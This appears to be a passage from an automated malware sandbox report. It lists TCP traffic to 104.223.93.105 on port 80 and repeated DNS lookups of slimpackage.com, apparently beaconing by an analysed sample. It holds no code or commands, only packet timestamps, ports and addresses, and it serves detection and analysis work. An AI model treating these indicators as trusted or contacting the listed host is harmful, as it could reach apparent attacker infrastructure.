Jan 14, 2022 17:29:47.042594910 CET	80	49841	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:47.042817116 CET	49841	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:47.172377110 CET	80	49841	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:47.179666996 CET	80	49841	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:47.179728031 CET	80	49841	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:47.179825068 CET	49841	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:47.179857016 CET	49841	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:47.310161114 CET	80	49841	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:50.939913988 CET	49843	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:51.159269094 CET	80	49843	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:51.159437895 CET	49843	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:51.162188053 CET	49843	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:51.378942966 CET	80	49843	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:51.379081011 CET	49843	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:51.559551001 CET	80	49843	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:51.567084074 CET	80	49843	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:51.567110062 CET	80	49843	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:51.567270041 CET	49843	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:51.567327023 CET	49843	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:51.738595963 CET	80	49843	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:53.579495907 CET	49844	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:53.707483053 CET	80	49844	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:53.707647085 CET	49844	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:53.715307951 CET	49844	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:53.843348026 CET	80	49844	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:53.843499899 CET	49844	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:54.054286003 CET	80	49844	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:54.062087059 CET	80	49844	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:54.062113047 CET	80	49844	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:54.062216997 CET	49844	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:54.062247038 CET	49844	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:54.190412045 CET	80	49844	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:55.596123934 CET	49845	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:55.727226019 CET	80	49845	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:55.727401018 CET	49845	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:55.732333899 CET	49845	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:55.863544941 CET	80	49845	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:55.863666058 CET	49845	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:55.994648933 CET	80	49845	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:56.001481056 CET	80	49845	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:56.001569033 CET	80	49845	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:56.001678944 CET	49845	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:56.001737118 CET	49845	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:56.132621050 CET	80	49845	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:57.437242985 CET	49848	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:57.568937063 CET	80	49848	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:57.569062948 CET	49848	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:57.571676016 CET	49848	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:57.702532053 CET	80	49848	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:57.702625990 CET	49848	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:57.833556890 CET	80	49848	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:57.842660904 CET	80	49848	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:57.842812061 CET	80	49848	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:57.842842102 CET	49848	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:57.842896938 CET	49848	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:57.974230051 CET	80	49848	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:59.991456032 CET	49850	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:00.121311903 CET	80	49850	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:00.121561050 CET	49850	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:00.627162933 CET	49850	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:00.795715094 CET	80	49850	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:00.795773983 CET	49850	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:00.925806046 CET	80	49850	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:00.945791006 CET	80	49850	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:00.945838928 CET	80	49850	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:00.945888042 CET	49850	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:00.945928097 CET	49850	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:01.101733923 CET	80	49850	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:01.902124882 CET	49851	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:02.033386946 CET	80	49851	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:02.036441088 CET	49851	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:02.041045904 CET	49851	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:02.204386950 CET	80	49851	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:02.205429077 CET	49851	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:02.336788893 CET	80	49851	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:02.345097065 CET	80	49851	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:02.345124006 CET	80	49851	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:02.345972061 CET	49851	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:02.346041918 CET	49851	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:02.477041960 CET	80	49851	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:03.266788960 CET	49852	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:03.398585081 CET	80	49852	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:03.398768902 CET	49852	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:03.405898094 CET	49852	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:03.536973953 CET	80	49852	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:03.537081957 CET	49852	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:03.668066025 CET	80	49852	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:03.689683914 CET	80	49852	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:03.689716101 CET	80	49852	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:03.689862967 CET	49852	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:03.689912081 CET	49852	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:03.821629047 CET	80	49852	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:04.713110924 CET	49853	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:04.844341040 CET	80	49853	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:04.844585896 CET	49853	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:04.852682114 CET	49853	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:04.983932972 CET	80	49853	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:04.985002041 CET	49853	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:05.116051912 CET	80	49853	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:05.125155926 CET	80	49853	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:05.125205994 CET	80	49853	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:05.125437021 CET	49853	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:05.125487089 CET	49853	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:05.257143974 CET	80	49853	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:06.307260036 CET	49854	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:06.438306093 CET	80	49854	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:06.438412905 CET	49854	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:06.441231966 CET	49854	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:06.623276949 CET	80	49854	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:06.623379946 CET	49854	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:06.779055119 CET	80	49854	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:06.788499117 CET	80	49854	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:06.788573027 CET	80	49854	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:06.788675070 CET	49854	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:06.788773060 CET	49854	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:06.920650959 CET	80	49854	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:07.940733910 CET	49855	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:08.071841002 CET	80	49855	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:08.072000980 CET	49855	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:08.079184055 CET	49855	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:08.386604071 CET	80	49855	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:08.386858940 CET	49855	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:08.517844915 CET	80	49855	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:08.526288986 CET	80	49855	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:08.526335001 CET	80	49855	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:08.526524067 CET	49855	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:08.526614904 CET	49855	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:08.662318945 CET	80	49855	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:09.847970009 CET	49856	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:10.021980047 CET	80	49856	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:10.022083044 CET	49856	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:10.025450945 CET	49856	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:10.165180922 CET	80	49856	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:10.165288925 CET	49856	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:10.296250105 CET	80	49856	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:10.304357052 CET	80	49856	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:10.304399967 CET	80	49856	104.223.93.105	192.168.2.5
Jan 14, 2022 17:30:10.304513931 CET	49856	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:10.305048943 CET	49856	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:30:10.437370062 CET	80	49856	104.223.93.105	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2022 17:28:12.995415926 CET	54795	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:13.115070105 CET	53	54795	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:14.682817936 CET	49557	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:14.831212997 CET	53	49557	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:16.347955942 CET	61733	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:16.466959953 CET	53	61733	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:18.765908957 CET	52441	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:18.784615993 CET	53	52441	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:21.045820951 CET	62176	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:21.063589096 CET	53	62176	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:22.989414930 CET	59596	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:23.122594118 CET	53	59596	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:24.479134083 CET	65296	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:24.605462074 CET	53	65296	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:25.938558102 CET	63183	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:25.956110001 CET	53	63183	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:27.666655064 CET	60151	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:27.683886051 CET	53	60151	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:29.109404087 CET	56969	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:29.126961946 CET	53	56969	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:30.440949917 CET	55161	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:30.458503962 CET	53	55161	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:31.808276892 CET	54757	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:31.827296972 CET	53	54757	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:35.050508022 CET	60075	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:35.069721937 CET	53	60075	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:37.476960897 CET	55016	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:37.494354010 CET	53	55016	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:40.877268076 CET	64345	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:40.894728899 CET	53	64345	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:45.513106108 CET	57128	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:45.531521082 CET	53	57128	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:47.232352018 CET	54791	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:47.250000954 CET	53	54791	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:48.791320086 CET	50463	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:48.810790062 CET	53	50463	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:50.547035933 CET	50394	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:50.667985916 CET	53	50394	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:52.297509909 CET	53813	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:52.315208912 CET	53	53813	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:53.884567976 CET	63732	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:53.903908968 CET	53	63732	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:55.314445972 CET	57344	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:55.332171917 CET	53	57344	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:57.466471910 CET	54450	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:57.485555887 CET	53	54450	8.8.8.8	192.168.2.5
Jan 14, 2022 17:28:58.860917091 CET	57151	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:28:58.880289078 CET	53	57151	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:00.294476986 CET	59413	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:00.313199043 CET	53	59413	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:01.673733950 CET	60516	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:01.693216085 CET	53	60516	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:03.206645012 CET	51649	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:03.226144075 CET	53	51649	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:05.304295063 CET	65086	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:05.325781107 CET	53	65086	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:06.891650915 CET	56432	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:06.909065008 CET	53	56432	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:08.238142967 CET	52929	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:08.256097078 CET	53	52929	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:11.123244047 CET	61004	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:11.142402887 CET	53	61004	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:14.032655954 CET	56895	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:14.052234888 CET	53	56895	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:16.754798889 CET	62372	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:16.775743008 CET	53	62372	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:18.536864042 CET	56675	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:18.556022882 CET	53	56675	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:23.424036980 CET	57172	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:23.441941023 CET	53	57172	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:25.630590916 CET	55267	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:25.648001909 CET	53	55267	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:27.556257010 CET	50969	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:27.575892925 CET	53	50969	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:29.772454023 CET	64362	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:29.789906025 CET	53	64362	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:32.703675032 CET	54766	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:32.720993996 CET	53	54766	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:34.722784042 CET	61446	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:34.742059946 CET	53	61446	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:36.260248899 CET	57515	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:36.279872894 CET	53	57515	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:37.642805099 CET	58199	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:37.662089109 CET	53	58199	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:38.999887943 CET	65221	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:39.019954920 CET	53	65221	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:40.372648001 CET	61573	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:40.392208099 CET	53	61573	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:41.774826050 CET	56562	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:41.792356014 CET	53	56562	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:43.280211926 CET	53591	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:43.299621105 CET	53	53591	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:44.712246895 CET	59688	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:44.731709957 CET	53	59688	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:46.758122921 CET	56032	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:46.777492046 CET	53	56032	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:50.919126987 CET	63458	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:50.937889099 CET	53	63458	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:53.559356928 CET	50422	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:53.576899052 CET	53	50422	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:55.574177027 CET	53247	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:55.593589067 CET	53	53247	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:57.418695927 CET	53814	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:57.436048031 CET	53	53814	8.8.8.8	192.168.2.5
Jan 14, 2022 17:29:59.970988035 CET	51305	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:29:59.990144014 CET	53	51305	8.8.8.8	192.168.2.5
Jan 14, 2022 17:30:01.880326033 CET	53670	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:30:01.900036097 CET	53	53670	8.8.8.8	192.168.2.5
Jan 14, 2022 17:30:03.246323109 CET	55160	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:30:03.264153004 CET	53	55160	8.8.8.8	192.168.2.5
Jan 14, 2022 17:30:04.588593960 CET	61414	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:30:04.710212946 CET	53	61414	8.8.8.8	192.168.2.5
Jan 14, 2022 17:30:06.287013054 CET	63847	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:30:06.306135893 CET	53	63847	8.8.8.8	192.168.2.5
Jan 14, 2022 17:30:07.919339895 CET	61523	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:30:07.938632011 CET	53	61523	8.8.8.8	192.168.2.5
Jan 14, 2022 17:30:09.826633930 CET	50551	53	192.168.2.5	8.8.8.8
Jan 14, 2022 17:30:09.846517086 CET	53	50551	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 14, 2022 17:28:12.995415926 CET	192.168.2.5	8.8.8.8	0xcc77	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:14.682817936 CET	192.168.2.5	8.8.8.8	0x2fa2	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:16.347955942 CET	192.168.2.5	8.8.8.8	0xefad	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:18.765908957 CET	192.168.2.5	8.8.8.8	0x3ce6	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:21.045820951 CET	192.168.2.5	8.8.8.8	0x8000	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:22.989414930 CET	192.168.2.5	8.8.8.8	0x4772	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:24.479134083 CET	192.168.2.5	8.8.8.8	0x76d2	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:25.938558102 CET	192.168.2.5	8.8.8.8	0x1ce3	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:27.666655064 CET	192.168.2.5	8.8.8.8	0x2531	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:29.109404087 CET	192.168.2.5	8.8.8.8	0xdc7f	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:30.440949917 CET	192.168.2.5	8.8.8.8	0x29b6	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:31.808276892 CET	192.168.2.5	8.8.8.8	0xd171	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:35.050508022 CET	192.168.2.5	8.8.8.8	0xbf81	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:37.476960897 CET	192.168.2.5	8.8.8.8	0xd37b	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:40.877268076 CET	192.168.2.5	8.8.8.8	0xef55	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:45.513106108 CET	192.168.2.5	8.8.8.8	0x734c	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:47.232352018 CET	192.168.2.5	8.8.8.8	0x84bc	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:48.791320086 CET	192.168.2.5	8.8.8.8	0x2c2b	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:50.547035933 CET	192.168.2.5	8.8.8.8	0x1ed1	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:52.297509909 CET	192.168.2.5	8.8.8.8	0xbf51	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:53.884567976 CET	192.168.2.5	8.8.8.8	0xf1f7	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:55.314445972 CET	192.168.2.5	8.8.8.8	0x3666	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:57.466471910 CET	192.168.2.5	8.8.8.8	0x34a	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:28:58.860917091 CET	192.168.2.5	8.8.8.8	0x1206	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:00.294476986 CET	192.168.2.5	8.8.8.8	0xbb58	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:01.673733950 CET	192.168.2.5	8.8.8.8	0x7fba	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:03.206645012 CET	192.168.2.5	8.8.8.8	0x34ba	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:05.304295063 CET	192.168.2.5	8.8.8.8	0xd94f	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:06.891650915 CET	192.168.2.5	8.8.8.8	0x5a1b	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:08.238142967 CET	192.168.2.5	8.8.8.8	0x2f60	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:11.123244047 CET	192.168.2.5	8.8.8.8	0x8dfb	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:14.032655954 CET	192.168.2.5	8.8.8.8	0xd123	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:16.754798889 CET	192.168.2.5	8.8.8.8	0xc2dc	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:18.536864042 CET	192.168.2.5	8.8.8.8	0xc671	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:23.424036980 CET	192.168.2.5	8.8.8.8	0x2830	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:25.630590916 CET	192.168.2.5	8.8.8.8	0x511b	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:27.556257010 CET	192.168.2.5	8.8.8.8	0x561b	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:29.772454023 CET	192.168.2.5	8.8.8.8	0x46ba	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:32.703675032 CET	192.168.2.5	8.8.8.8	0xe1d0	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:34.722784042 CET	192.168.2.5	8.8.8.8	0xf4ac	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:36.260248899 CET	192.168.2.5	8.8.8.8	0xd601	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:37.642805099 CET	192.168.2.5	8.8.8.8	0xf120	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:38.999887943 CET	192.168.2.5	8.8.8.8	0x4137	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:40.372648001 CET	192.168.2.5	8.8.8.8	0xe792	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:41.774826050 CET	192.168.2.5	8.8.8.8	0x5997	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
Jan 14, 2022 17:29:43.280211926 CET	192.168.2.5	8.8.8.8	0x38e4	Standard query (0)	slimpackage.com	A (IP address)	IN (0x0001)
